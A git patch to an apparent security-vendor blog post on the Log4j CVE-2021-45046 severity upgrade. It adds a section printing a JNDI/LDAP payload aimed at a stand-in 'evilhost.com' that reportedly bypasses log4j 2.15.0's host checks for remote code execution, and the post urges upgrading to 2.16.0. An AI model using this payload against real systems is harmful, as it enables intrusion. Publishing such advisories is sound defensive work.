From 0f47f256e0bf145a89969290b4559fca12ee393f Mon Sep 17 00:00:00 2001 From: Free Wortley Date: Fri, 17 Dec 2021 03:41:43 -0600 Subject: [PATCH] Add bypass payload to post --- docs/blog/2021-12-18-log4j-update-increased-cvss.mdx | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/docs/blog/2021-12-18-log4j-update-increased-cvss.mdx b/docs/blog/2021-12-18-log4j-update-increased-cvss.mdx index 93f30a77b..d5a30c666 100644 --- a/docs/blog/2021-12-18-log4j-update-increased-cvss.mdx +++ b/docs/blog/2021-12-18-log4j-update-increased-cvss.mdx @@ -42,6 +42,8 @@ _The logo gets worse as the situation gets worse..._ Earlier today, the second Log4j vulnerability (CVE-2021-45046) was upgraded from a [CVSS score of 3.7](https://web.archive.org/web/20211215180723/https://logging.apache.org/log4j/2.x/security.html) (limited DOS) to a [CVSS score of 9.0](https://logging.apache.org/log4j/2.x/security.html) (limited RCE). +See the bottom of this post for an example exploit payload that bypasses the checks in log4j 2.15.0. + **Just trying to patch Log4Shell? Please read our dedicated [Mitigation Guide](https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide/).** @@ -125,6 +127,16 @@ list, a full RCE is possible in the above code as we can access `attacker.com` n It is strongly recommended that you update to 2.16.0, even if you have previously updated to 2.15.0, to mitigate these new bypasses. +## Update: The localhost Bypass was Discovered! + +It was [posted](https://twitter.com/marcioalm/status/1471740771581652995) on Twitter by Márcio Almeida early on +December 17th. + +This payload will bypass the network host restrictions in log4j 2.15.0 and allow full RCE again: +``` +${jndi:ldap://127.0.0.1#evilhost.com:1389/a} +``` + ## Stay Updated Please follow us on [Twitter](https://twitter.com/LunaSecIO) or add yourself to our mailing list below, and we'll